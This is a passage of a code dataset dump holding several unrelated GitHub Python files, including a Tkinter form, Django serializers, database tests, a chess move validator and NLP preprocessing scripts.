directory=name\n )\n )\n cmake_conf = CMakeBuild(prefix=config.install_prefix)\n cm_build_dir = config.build_prefix + \"/\" + name + \"_build\"\n cm_source_dir = config.build_prefix + \"/\" + name\n cm.append(\n cmake_conf.configure_step(\n build_directory=cm_build_dir, directory=cm_source_dir, opts=opts\n )\n )\n cm.append(cmake_conf.build_step(parallel=config.get_cmake_compiler_threads(), target=\"install\"))\n if not config.keep_build:\n config.paths_to_delete.append(cm_build_dir)\n config.paths_to_delete.append(cm_source_dir)\n return cm\n\ndef add_libcxx_cmake_arg(inputList: List[str]) -> List[str]:\n \"\"\"If the class attribute build_libcxx is true, add -DCMAKE_CXX_FLAGS=\"-stdlib=libc++\" to cmake flags in inputlist.\n\n :param inputlist: List of cmake flags\n :type inputlist: List[str]\n :returns: inputlist plus -DCMAKE_CXX_FLAGS=\"-stdlib=libc++\" if self.build_libcxx is true\n :rtype: List[str]\n\n \"\"\"\n for i, elem in enumerate(inputList):\n if elem.startswith('-DCMAKE_CXX_FLAGS=\"'):\n inputList[i] = elem[:-1] + ' -stdlib=libc++\"'\n return inputList\n\n inputList.append('-DCMAKE_CXX_FLAGS=\"-stdlib=libc++\"')\n return inputList\n","repo_name":"ComputationalRadiationPhysics/xeus-cling-cuda-container","sub_path":"xcc/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"37591838762","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom BLL import tip_material_bll\nfrom DTO import tip_material_dto\n\n\nclass FrmCadTipMaterial(Toplevel):\n def __init__(self, master=None):\n Toplevel.__init__(self, master)\n\n self.title('Cadastro de Tipo de Material')\n w = 440\n h = 450\n x = (self.winfo_screenwidth() / 2) - w / 2\n y = (self.winfo_screenheight() / 2) - h / 2\n self.geometry('%dx%d+%d+%d' %(w, h, x, y))\n\n self.resizable(0,0)\n self.grab_set()\n\n self.var_descricao = StringVar()\n self.var_id = StringVar()\n self.var_msg = StringVar()\n\n self.criar_widgets()\n\n self.preparar()\n\n def limpar(self):\n self.var_id.set('')\n self.var_descricao.set('')\n self.var_msg.set('')\n\n def preparar(self):\n self.limpar()\n self.txt_descricao['state'] = 'disabled'\n self.btn_gravar['state'] = 'disabled'\n self.btn_excluir['state'] = 'disabled'\n self.listar()\n\n def criar_widgets(self):\n fonte_padrao = 'Verdana 10 bold'\n\n fr0 = Frame(self, borderwidth=1, relief=SOLID)\n fr0.place(height=50, width=420, x=10, y=10)\n\n frm = Frame(self, borderwidth=1, relief=SOLID)\n frm.place(height=370, width=420, x=10, y= 70)\n\n self.lbl_msg = Label(fr0, text='', textvariable=self.var_msg, font=('Tahoma 22 bold'), relief=RAISED, width=15, bg='#B0C4DE')\n self.lbl_msg.pack(expand=True, fill=X)\n\n Label(frm, text='ID:', font=fonte_padrao).place(x=10, y=10)\n self.lbl_id = Label(frm, font=fonte_padrao, relief=SOLID, width=15, textvariable=self.var_id, anchor=W, bg='#C0C0C0')\n self.lbl_id.place(x=10, y=30)\n\n Label(frm, text='Descrição:', font=fonte_padrao).place(x=10, y=60)\n self.txt_descricao = Entry(frm, font=fonte_padrao, width=25, relief=SOLID, textvariable=self.var_descricao)\n self.txt_descricao.place(x=10, y=80)\n\n self.treeview = ttk.Treeview(frm, columns=('a'))\n self.treeview.column('#0', width=5)\n self.treeview.heading('#0', text='ID', anchor=W)\n self.treeview.heading('#1', text='DESCRIÇÃO', anchor=W)\n\n vsb = ttk.Scrollbar(frm, orient=VERTICAL, command=self.treeview.yview)\n\n self.treeview.configure(yscrollcommand=vsb.set)\n\n self.treeview.bind('<>', self.item_selecionado)\n\n vsb.place(x=385, y=120, height=200)\n self.treeview.place(x=10, y=120, width=385, height=200)\n\n self.btn_novo = Button(frm, text='Novo', font=fonte_padrao, width=7, command=self.novo)\n self.btn_novo.place(x=10, y=330)\n self.btn_gravar = Button(frm, text='Gravar', font=fonte_padrao, width=7, command=self.gravar)\n self.btn_gravar.place(x=90, y=330)\n self.btn_excluir = Button(frm, text='Excluir', font=fonte_padrao, width=7, command=self.excluir)\n self.btn_excluir.place(x=170, y=330)\n\n def listar(self):\n bll = tip_material_bll.TipMaterialBll()\n r = bll.retornar_dados('todos')\n\n self.treeview.delete(*self.treeview.get_children())\n\n for i in r:\n self.treeview.insert('', 'end', text=str(i[0]), values=(i[1]))\n\n def novo(self):\n self.limpar()\n self.txt_descricao.focus()\n self.txt_descricao['state'] = 'normal'\n self.btn_gravar['state'] = 'normal'\n self.btn_excluir['state'] = 'disabled'\n self.var_msg.set('Novo Registro')\n self.lbl_msg['fg'] = '#00008B'\n\n def excluir(self):\n p = messagebox.askquestion('Excluir', 'Deseja excluir este registro?', parent=self)\n if p == 'yes':\n bll = tip_material_bll.TipMaterialBll()\n ID = int(self.var_id.get())\n r = bll.excluir(ID)\n if r == 1:\n messagebox.showinfo('Excluído', 'Registro excluído com sucesso!', parent=self)\n self.preparar()\n else:\n messagebox.showerror('Erro', str(r), parent=self)\n\n def gravar(self):\n obj = tip_material_dto.TipMaterialDto()\n obj.descricao = self.var_descricao.get().upper()\n ID = self.var_id.get()\n bll = tip_material_bll.TipMaterialBll()\n v = bll.validar_campo(obj)\n if v != 'OK':\n messagebox.showwarning('Aviso', str(v), parent=self)\n return\n \n if ID == '':\n r = bll.inserir(obj)\n msg = 'Registro incluído com sucesso!'\n else:\n obj.ID = int(ID)\n r = bll.editar(obj)\n msg = 'Registro alterado com sucesso!'\n\n if r == 1:\n messagebox.showinfo('Gravado', msg, parent=self)\n self.preparar()\n else:\n messagebox.showerror('Erro', str(r), parent=self)\n\n def item_selecionado(self, event):\n ID = self.treeview.focus()\n tupla = (int(self.treeview.item(ID)['text']), str(self.treeview.item(ID)['values'][0]))\n\n self.var_id.set(str(tupla[0]))\n self.var_descricao.set(str(tupla[1]))\n\n self.txt_descricao['state'] = 'normal'\n self.btn_gravar['state'] = 'normal'\n self.btn_excluir['state'] = 'normal'\n\n self.var_msg.set('Alterar Registro')\n self.lbl_msg['fg'] = '#A52A2A'\n","repo_name":"Valterlande/ProjetoTigre","sub_path":"GUI_TKINTER/frm_cad_tip_material.py","file_name":"frm_cad_tip_material.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24933828566","text":"from . import serializers, Person, Address, PhoneNumber, Email, BasicEmailSerializer, \\\n BasicPhoneNumberSerializer, BasicAddressSerializer, AddressSerializer, PhoneNumberSerializer, EmailSerializer\n\n\nclass PersonSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n first_name = serializers.CharField(max_length=100)\n last_name = serializers.CharField(max_length=100)\n date_of_birth = serializers.DateField()\n\n class Meta:\n model = Person\n fields = (\n 'id',\n 'first_name',\n 'last_name',\n 'date_of_birth',\n )\n\n\nclass CreatePersonSerializer(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n first_name = serializers.CharField(max_length=100)\n last_name = serializers.CharField(max_length=100)\n date_of_birth = serializers.DateField()\n addresses = BasicAddressSerializer(many=True, required=False)\n phone_numbers = BasicPhoneNumberSerializer(many=True)\n emails = BasicEmailSerializer(many=True)\n\n def create(self, validated_data):\n person = Person(\n first_name=validated_data.get('first_name'),\n last_name=validated_data.get('last_name'),\n date_of_birth=validated_data.get('date_of_birth'),\n )\n\n person.save()\n\n phone_number_objects = self.create_phone_numbers(validated_data.get('phone_numbers'), person)\n email_objects = self.create_emails(validated_data.get('emails'), person)\n address_objects = []\n\n if validated_data.get('addresses'):\n address_objects = self.create_addresses(validated_data.get('addresses'), person)\n\n return {\n 'id': person.id,\n 'first_name': person.first_name,\n 'last_name': person.last_name,\n 'date_of_birth': person.date_of_birth,\n 'addresses': address_objects,\n 'phone_numbers': phone_number_objects,\n 'emails': email_objects\n }\n\n def create_addresses(self, address_data, person):\n addresses = [Address(**address, person=person) for address in address_data]\n address_objects = Address.objects.bulk_create(addresses)\n return address_objects\n\n def create_phone_numbers(self, phone_number_data, person):\n phone_numbers = [PhoneNumber(**phone_number, person=person) for phone_number in phone_number_data]\n phone_number_objects = PhoneNumber.objects.bulk_create(phone_numbers)\n return phone_number_objects\n\n def create_emails(self, email_data, person):\n emails = [Email(**email, person=person) for email in email_data]\n email_objects = Email.objects.bulk_create(emails)\n return email_objects\n\n\nclass PersonListSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n first_name = serializers.CharField(max_length=100)\n last_name = serializers.CharField(max_length=100)\n date_of_birth = serializers.DateField()\n addresses = AddressSerializer(many=True, read_only=True)\n phone_numbers = PhoneNumberSerializer(many=True, read_only=True)\n emails = EmailSerializer(many=True, read_only=True)\n\n @staticmethod\n def setup_eager_loading(queryset):\n queryset = queryset.prefetch_related('phone_numbers').prefetch_related('emails').prefetch_related(\n 'addresses').order_by('first_name')\n return queryset\n\n class Meta:\n model = Person\n fields = (\n 'id',\n 'first_name',\n 'last_name',\n 'date_of_birth',\n 'addresses',\n 'phone_numbers',\n 'emails'\n )","repo_name":"domface/servicefusion","sub_path":"api/addresses/serializers/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72232924888","text":"import datetime\nimport logging\nimport time\nimport unittest\n\nfrom dateutil.tz import tzutc\nfrom sqlalchemy.orm import sessionmaker\n\nfrom usage.model import session_scope, Usage, get_engine, MonthlyReport, RunningPod\nfrom usage.report import generate_reports, generate_report, create_report_working_table\nfrom usage.running_pods_monitor import update_finished_time, EVENT_REQUEST_TIMEOUT, \\\n update_finished_time_for_no_event_pods\n\nUNFINISHED_UID = 'i-am-a-unfinished-pod'\nNO_USAGE_UID = 'event-existing-but-no-usage'\n\ndb_connection = 'postgresql://postgres:mysecretpassword@localhost:5432/postgres'\n\n\ndef is_local_database_available():\n try:\n with session_scope(db_connection) as s:\n result = s.bind.execute('SELECT version()').fetchall()\n for row in result:\n return True\n except Exception:\n return False\n\n\ndef create_test_data(uid=UNFINISHED_UID):\n u = Usage()\n u.uid = uid\n u.pod_name = 'i-am-a-unfinished-pod'\n u.group_name = 'test'\n u.user_name = 'test'\n u.component = 'jupyter'\n u.component_name = 'foo-bar'\n u.instance_type = 'cpu-1'\n u.gpu = 0\n u.cpu = 1\n u.memory = 1024 ** 3\n u.poke_updated_time()\n u.scheduled_time = datetime.datetime(2020, 1, 1, 18, 00, 00, tzinfo=tzutc())\n u.finished_time = None\n return u\n\n\ndef create_event(uid):\n event = RunningPod()\n event.uid = uid\n event.scheduled_time = datetime.datetime.utcnow()\n event.updated_time = datetime.datetime.utcnow() - datetime.timedelta(seconds=EVENT_REQUEST_TIMEOUT)\n with session_scope(db_connection) as s:\n s.add(event)\n\n\nclass TestRunningPods(unittest.TestCase):\n\n def setUp(self) -> None:\n if not is_local_database_available():\n self.skipTest('Skip regression tests, because localhost:5432/postgres is not available')\n\n with session_scope(db_connection) as s:\n data = create_test_data()\n s.add(data)\n self.usage = data\n\n def tearDown(self) -> None:\n if is_local_database_available():\n with session_scope(db_connection) as s:\n s.delete(self.usage)\n\n with session_scope(db_connection) as s:\n self.running_pod_by_uid(s).delete()\n s.query(RunningPod).filter_by(uid=NO_USAGE_UID).delete()\n\n def test_running_pods_event_existing_without_usage_data(self):\n # there is an event in primehub_running_pods table without related usage\n create_event(NO_USAGE_UID)\n\n # invoke updater\n update_finished_time(db_connection)\n\n # verifying the event has gone\n self.verify_event_deleted(NO_USAGE_UID)\n\n def verify_event_deleted(self, uid):\n with session_scope(db_connection) as s:\n result = s.query(RunningPod).filter_by(uid=uid).one_or_none()\n self.assertIsNone(result)\n\n def test_unfinished_pods(self):\n # there is an unfinished pod in primehub_usages table\n # there is an event in primehub_running_pods table\n create_event(UNFINISHED_UID)\n\n # pre-condition\n # we found data both in usage and event\n with session_scope(db_connection) as s:\n self.assertIsNotNone(self.running_pod_by_uid(s).one())\n\n # before updating the finished_time is none\n usage = s.query(Usage).filter_by(uid=UNFINISHED_UID).one()\n self.assertIsNone(usage.finished_time)\n\n # invoke updater at the first round\n update_finished_time(db_connection)\n\n # verify usage marked finished\n with session_scope(db_connection) as s:\n self.assertIsNotNone(self.running_pod_by_uid(s).one())\n\n # before updating the finished_time is none\n usage = s.query(Usage).filter_by(uid=UNFINISHED_UID).one()\n self.assertIsNotNone(usage.finished_time)\n\n # invoke updater at the second round\n update_finished_time(db_connection)\n\n # verify usage still marked finished and event is deleted\n with session_scope(db_connection) as s:\n self.assertIsNone(self.running_pod_by_uid(s).one_or_none())\n\n # before updating the finished_time is none\n usage = s.query(Usage).filter_by(uid=UNFINISHED_UID).one()\n self.assertIsNotNone(usage.finished_time)\n\n def running_pod_by_uid(self, s):\n return s.query(RunningPod).filter_by(uid=UNFINISHED_UID)\n\n\nUID_FOR_POD_WITHOUT_EVENTS = 'pod-without-event'\n\n\nclass TestEventsNotExistingInRunningPods(unittest.TestCase):\n\n def setUp(self) -> None:\n if not is_local_database_available():\n self.skipTest('Skip regression tests, because localhost:5432/postgres is not available')\n\n def tearDown(self) -> None:\n if is_local_database_available():\n with session_scope(db_connection) as s:\n s.query(Usage).filter_by(uid=UID_FOR_POD_WITHOUT_EVENTS).delete()\n\n def test_finished_pods_without_any_events(self):\n # there is an unfinished pod in primehub_usages table\n # there is no events in primehub_running_pods table\n\n with session_scope(db_connection) as s:\n s.add(create_test_data(uid=UID_FOR_POD_WITHOUT_EVENTS))\n\n # verify the pod has not finished yet\n with session_scope(db_connection) as s:\n self.assertIsNone(s.query(Usage).filter_by(uid=UID_FOR_POD_WITHOUT_EVENTS).one().finished_time)\n\n # patch the finished time in pods without events\n update_finished_time_for_no_event_pods(db_connection)\n\n # verify finished_time should be updated_time\n with session_scope(db_connection) as s:\n usage = s.query(Usage).filter_by(uid=UID_FOR_POD_WITHOUT_EVENTS).one()\n self.assertEqual(usage.updated_time, usage.finished_time)\n","repo_name":"InfuseAI/primehub-usage","sub_path":"tests/test_running_pods_monitor.py","file_name":"test_running_pods_monitor.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37917635335","text":"def validate_move(chess_board, from_coordinate, to_coordinate):\n \"\"\"white piece moves first - can work this out by having \"\"\"\n if not _validate_coordinate(from_coordinate):\n raise ValidationException(\"Please enter valid coordinates\")\n\n if not _validate_coordinate(to_coordinate):\n print(\"failed at line 6\", to_coordinate)\n raise ValidationException(\"Please enter valid coordinates\")\n\n from_piece = chess_board.get(from_coordinate)\n if from_piece == None:\n print(\"Are you blind! there's nothing here\")\n raise ValidationException(\"Please enter valid coordinates\")\n\n if chess_board.get(to_coordinate) != None:\n if from_piece[2] == chess_board.get(to_coordinate)[2]:\n raise ValidationException(\"Please enter valid coordinates\")\n\n from_column_number = coordinate_to_column_number(from_coordinate)\n to_column_number = coordinate_to_column_number(to_coordinate)\n\n if from_piece[0] == \"K\":\n return _validate_king_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"P\":\n return _validate_pawn_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"C\":\n return _validate_rook_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"B\":\n return _validate_bishop_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"Q\":\n return _validate_queen_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"H\":\n return _validate_knight_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n return True\n\ndef _validate_coordinate(coordinate):\n\n if not len(coordinate) == 2:\n raise ValidationException(\"make sure you enter a 2 character coordinate\")\n if not coordinate[0] in \"ABCDEFGH\":\n print(\"not valid column\")\n raise ValidationException(\"Please enter valid coordinates\")\n if not coordinate[1] in \"12345678\":\n print(\"not valid row\")\n raise ValidationException(\"Please enter valid coordinates\")\n if len(coordinate) != 2:\n raise ValidationException(\"Please enter valid coordinates\")\n return True\n\ndef coordinate_to_column_number(coordinate):\n column = \"ABCDEFGH\"\n column_coordinate = column.index(coordinate[0])\n return column_coordinate\n\ndef _validate_king_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n \"\"\"\"validate the from_coordinates is within one of the to_coordinates\"\"\"\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n\n if not (to_row -1 <= from_row <= to_row +1):\n raise ValidationException(\"Please enter valid coordinates\")\n\n if not (to_column_number -1 <= from_column_number <= to_column_number +1):\n raise ValidationException(\"Please enter valid coordinates\")\n\n return True\n\ndef _validate_pawn_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n\n from_piece_colour = chess_board.get(from_coordinates)[2]\n if from_piece_colour == \"B\":\n direction = -1\n else:\n direction = +1\n\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n\n if chess_board.get(to_coordinates) is None:\n if not from_column_number == to_column_number:\n raise ValidationException(\"Please enter valid coordinates\")\n\n \"\"\"if to_co-ordinate is diagonally forward from from position\"\"\"\n # direction = from_column_number\n if ((from_column_number == to_column_number +1 or from_column_number == to_column_number -1) \\\n and to_row == from_row + direction) and chess_board.get(to_coordinates) == None:\n raise ValidationException(\"Please enter valid coordinates\")\n\n# \"\"\"adding things here to validate the last line in test Validate using ands AND ors\"\"\"\n if not (to_row == from_row + direction\n or ((from_row == 7 or from_row == 2) and to_row == from_row + (direction * 2))):\n\n raise ValidationException(\"Not a standard pawn move\")\n\n\n return True\n\ndef _validate_rook_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n # from_piece_colour = chess_board.get(from_coordinates)[2]\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n if not (from_column_number == to_column_number or from_row == to_row):\n raise ValidationException(\"Please enter valid coordinates\")\n\n if not from_row == to_row:\n if from_row >= to_row:\n x = range(to_row+1, from_row)\n else:\n x = range(from_row+1, to_row)\n\n for i in x:\n test_coordiante = from_coordinates[0]+ str(i)\n if chess_board.get(test_coordiante) != None:\n raise ValidationException(\"Please enter valid coordinates\")\n\n else:\n if from_column_number >= to_column_number:\n y = range(to_column_number + 1, from_column_number)\n else:\n y = range(from_column_number + 1, to_column_number)\n\n for i in y:\n test_coordiante = \"ABCDEFGH\"[i] + from_coordinates[1]\n if chess_board.get(test_coordiante) != None:\n raise ValidationException(\"Please enter valid coordinates\")\n\n # print(\"x\",x)\n # y = range(from_column_number, to_column_number)\n # print(\"y\",y)\n # from_coordinates = from_column_number and from_row\n # print(\"from coord\",from_coordinates)\n # to_coordinates = to_column_number and to_row\n # print(\"to coord\",to_coordinates)\n #\n # if from_column_number == to_column_number:\n # x +\n # return False\n return True\n\ndef _validate_bishop_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n # bishop = chess_board.get(from_coordinates)[0] == \"B\"\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n\n move = [(to_column_number - from_column_number),(to_row - from_row)]\n\n if not abs(move[0]) == abs(move[1]):\n raise ValidationException(\"Please enter valid coordinates.3\")\n\n return True\n\ndef _validate_knight_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n\n move = [abs(to_column_number - from_column_number), abs(to_row - from_row)]\n\n if not (move[0] == 1 and move[1] == 2 or move[0] == 2 and move[1] == 1):\n raise ValidationException(\"Please enter valid coordinates\")\n return True\n\ndef _validate_queen_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n # from_coordiantes = chess_board.get(from_coordinates)\n # to_coordiantes = chess_board.get(to_coordinates)\n\n return _validate_rook_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number)\\\n or _validate_bishop_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number)\n\n\n # if not _validate_rook_move(che)\n\nclass ValidationException(Exception):\n pass","repo_name":"younism1/Chess-Project","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74235404247","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nfrom networkx.classes.graph import Graph\n\nabspath = \"C:\\\\Users\\\\mabet\\\\OneDrive - Aarhus Universitet\\\\Datalogi\\\\Bachelor projekt\"\n_file = \"\\\\BSc_project\\\\GraphsGeneration\\\\processed_graphs\\\\num_nodes\\\\0\\\\2.txt\"\npath_to_graph = abspath+_file # file 0.0\n\n# file_ending = \"698\"\n# r = open(f\"processed_graphs/facebook_{file_ending}.edges\", \"r\")\n\nr = open(path_to_graph, \"r\")\n\nclass GraphVisualization:\n \n def __init__(self):\n \n # visual is a list which stores all \n # the set of edges that constitutes a\n # graph\n self.visual = []\n \n # addEdge function inputs the vertices of an\n # edge and appends it to the visual list\n def addEdge(self, a, b):\n temp = [a, b]\n self.visual.append(temp)\n \n # In visualize function G is an object of\n # class Graph given by networkx G.add_edges_from(visual)\n # creates a graph with a given list\n # nx.draw_networkx(G) - plots the graph\n # plt.show() - displays the graph\n def visualize(self):\n G = nx.Graph()\n G.add_edges_from(self.visual)\n nx.draw_networkx(G)\n plt.show()\n \nG = GraphVisualization()\nlines = r.readlines()\nfor line in lines:\n a,b,p = line.split()\n G.addEdge(a,b)\nG.visualize()\n ","repo_name":"Sloeschcke/Disvocering-k-most-reliable-subgraphs-within-uncertain-graphs---BSc_project","sub_path":"GraphsGeneration/GraphVisualizer.py","file_name":"GraphVisualizer.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4876602233","text":"import random\n\ndef compute_power_p(n):\n global m, p\n arr = [0] * n\n arr[0] = 1\n for i in range(1, n):\n arr[i] = (arr[i-1] * p) % m\n\n return tuple(arr)\n\ndef rand_gen_da(n):\n global p_powers, k\n\n tab = {}\n tab1 = {}\n da = [0] * n\n c = 0\n n_zeros = n\n while True:\n ai = random.randint(-(k-1), k-1)\n i = random.randint(0, n-1)\n\n if da[i] == 0:\n n_zeros -= 1\n\n dai = (m + (ai - da[i]) % m) % m\n c = (c + dai * p_powers[i]) % m\n\n da[i] = ai\n\n if da[i] == 0:\n n_zeros += 1\n\n if n_zeros < n:\n if c == 0:\n return da\n\n tda = None\n if c not in tab:\n tda = tuple(da)\n tab[c] = tda\n\n pnc = (p_powers[n] * c) % m\n # c0 + p**n * c == 0 ???\n c0 = (m - pnc) % m\n if c0 in tab:\n res = list(tab[c0])\n res.extend(da)\n return res\n\n if pnc not in tab1:\n tda = tda or tuple(da)\n tab1[pnc] = tda\n\n pnc1 = (m - c) % m\n if pnc1 in tab1:\n res = list(da)\n res.extend(tab1[pnc1])\n return res\n\n assert False\n\nif __name__ == \"__main__\":\n n, k, p, m = input().strip().split(' ')\n n, k, p, m = [int(n), int(k), int(p), int(m)]\n p_powers = compute_power_p(n+1)\n\n da = rand_gen_da(n)\n n = len(da)\n a = [0] * n\n b = [0] * n\n for i in range(n):\n dai = da[i]\n if dai >= 0:\n a[i] = 1\n b[i] = 1 + dai\n else:\n a[i] = k\n b[i] = k + dai\n\n a.reverse()\n b.reverse()\n\n print(' '.join([str(x) for x in a]))\n print(' '.join([str(x) for x in b]))\n\n","repo_name":"vchernoy/coding","sub_path":"contests/2017/goldman_sachs_codesprint/transaction_certificates/transaction_certificates.py","file_name":"transaction_certificates.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2789151295","text":"import nltk\nfrom nltk.tokenize import NLTKWordTokenizer\nfrom pycocotools.coco import COCO\nimport os\nimport pickle\nimport gensim.downloader\nimport numpy as np\nfrom collections import OrderedDict, Counter\n\n\nfrom COCO_Caption import DATASET_ROOT\n\nfrom Levenshtein import distance as lev_dist\n\nfrom tqdm import tqdm\n\n\nTOP_K = 3\n\n\nif __name__ == '__main__':\n token_path = os.path.join(DATASET_ROOT, 'annotations', 'captions_tokens_count.pkl')\n\n if not os.path.isfile(token_path):\n captions_ann_paths = [\n os.path.join(DATASET_ROOT, 'annotations', 'captions_train2014.json'),\n os.path.join(DATASET_ROOT, 'annotations', 'captions_val2014.json'),\n ]\n\n caption_anns = [COCO(x) for x in captions_ann_paths]\n\n captions = list()\n\n for caption_ann in caption_anns:\n anns = [x['caption'].strip().lower() for x in caption_ann.anns.values()]\n captions.extend(anns)\n\n tokenizer = NLTKWordTokenizer()\n\n tokenized = [tokenizer.tokenize(x) for x in captions]\n\n token_set = Counter()\n\n for tkns in tokenized:\n token_set.update(tkns)\n\n with open(token_path, 'wb') as fp:\n pickle.dump(token_set, fp)\n else:\n with open(token_path, 'rb') as fp:\n token_set = pickle.load(fp)\n\n token_set = set(token_set.keys())\n\n wv = gensim.downloader.load(\"word2vec-google-news-300\")\n\n vocab_set = set(wv.key_to_index.keys())\n\n vmax = wv.vectors.max()\n vmin = wv.vectors.min()\n\n tokens_in_vocab = token_set.intersection(vocab_set)\n\n tokens_not_in_vocab = token_set.difference(tokens_in_vocab)\n\n vector_dict = OrderedDict({\n '': -wv.vectors[wv.key_to_index['']],\n '': wv.vectors[wv.key_to_index['']],\n '': np.random.uniform(low=vmin/10, high=vmax/10, size=wv.vector_size),\n '': np.random.uniform(low=vmin/10, high=vmax/10, size=wv.vector_size),\n })\n\n for tkn in tqdm(tokens_in_vocab):\n vector_dict[tkn] = wv.vectors[wv.key_to_index[tkn]]\n\n lower_case_match_tokens = set([x for x in vocab_set if x.lower() in tokens_not_in_vocab])\n\n for tkn in tqdm(lower_case_match_tokens):\n vector_dict[tkn.lower()] = wv.vectors[wv.key_to_index[tkn]]\n\n tokens_not_in_vocab = tokens_not_in_vocab.difference(lower_case_match_tokens)\n\n hyphen_subset = set([x for x in tokens_not_in_vocab if '-' in x])\n\n for tkn in tqdm(hyphen_subset):\n word_list = tkn.split('-')\n vecs = list()\n\n for word in word_list:\n if word in vocab_set:\n vec = wv.vectors[wv.key_to_index[word]]\n else:\n dists = [(lev_dist(word, x), x) for x in vocab_set]\n dists.sort(key=lambda x: x[0])\n x1 = np.array([wv.vectors[wv.key_to_index[x[1]]] for x in dists[:TOP_K]])\n vec = np.mean(x1, axis=0)\n vecs.append(vec)\n\n x1 = np.array(vecs)\n vec = np.mean(x1, axis=0)\n vector_dict[tkn] = vec\n\n tokens_not_in_vocab = tokens_not_in_vocab.difference(hyphen_subset)\n\n # Very very slow: 2 seconds per token, wil take 3+ hours to run\n '''\n for tkn in tqdm(tokens_not_in_vocab):\n dists = [(lev_dist(tkn, x), x) for x in vocab_set]\n dists.sort(key=lambda x: x[0])\n x1 = np.array([wv.vectors[wv.key_to_index[x[1]]] for x in dists[:TOP_K]])\n vec = np.mean(x1, axis=0)\n vector_dict[tkn] = vec\n '''\n\n for tkn in tqdm(tokens_not_in_vocab):\n vector_dict[tkn] = np.random.uniform(low=vmin, high=vmax, size=wv.vector_size)\n\n vector_path = os.path.join(DATASET_ROOT, 'annotations', 'captions_tokens_vectors.pkl')\n\n with open(vector_path, 'wb') as fp:\n pickle.dump(vector_dict, fp)\n\n print('Done')\n","repo_name":"ag169/Image-Captioning","sub_path":"datasets/COCO_Caption_Vocab_Word2Vec.py","file_name":"COCO_Caption_Vocab_Word2Vec.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70386665687","text":"import unittest\nfrom py_ezbar import ProgressBar, BarStyles, BarColors\n\n\nclass ProgressBarTestCase(unittest.TestCase):\n def setUp(self):\n self.range = range(5000)\n self.test_list = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n self.test_dict = {\n \"1\": {\n \"a\": \"b\"\n },\n \"2\": {\n \"c\": \"d\"\n },\n \"3\": {\n \"e\": \"f\"\n }\n }\n self.progress_bar = ProgressBar(show_fractions=True, color=BarColors.GREEN, style=BarStyles.DEFAULT)\n\n def test_progress_bar_for_range(self):\n for i in self.range:\n self.progress_bar(index=i, iterable=self.range, current=i)\n\n def test_progress_bar_for_list(self):\n for i, v in enumerate(self.test_list):\n self.progress_bar(index=i, iterable=self.test_list, current=v)\n\n def test_progress_bar_for_dict(self):\n for i, (k, v) in enumerate(self.test_dict.items()):\n self.progress_bar(index=i, iterable=self.test_dict, current=v)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kdrkrgz/ez-bar","sub_path":"tests/test_progress_bar.py","file_name":"test_progress_bar.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1224340639","text":"def find_captain_room_number():\n \"\"\"\n Input:\n n : number of members per group\n list1: a list contains rooms' number of members and captain room number.\n\n each room number repeat n times, except the captain room number.\n --> captain room number repeat less then (n-1) times compare to other\n room numbers\n\n let's call captain room number = c, repeat only 1 time.\n other rooms is l1, l2, ... lk, each room will repeat n times with the above conditions.\n\n --> set(list1) = {l1, l2, ..., lk, c} is known\n so, we can can calculate sum(set1)*n == (l1 + l2 + ... + lk + c) * n\n we can alse calculate sum(list1) = (l1 + l2 + ... + lk) * n + c\n here, due to:\n (l1 + l2 + ... + lk) * n + c == (l1 + l2 + ... + lk + c) * n - (n-1)*c\n | |\n V V\n sum(list1) 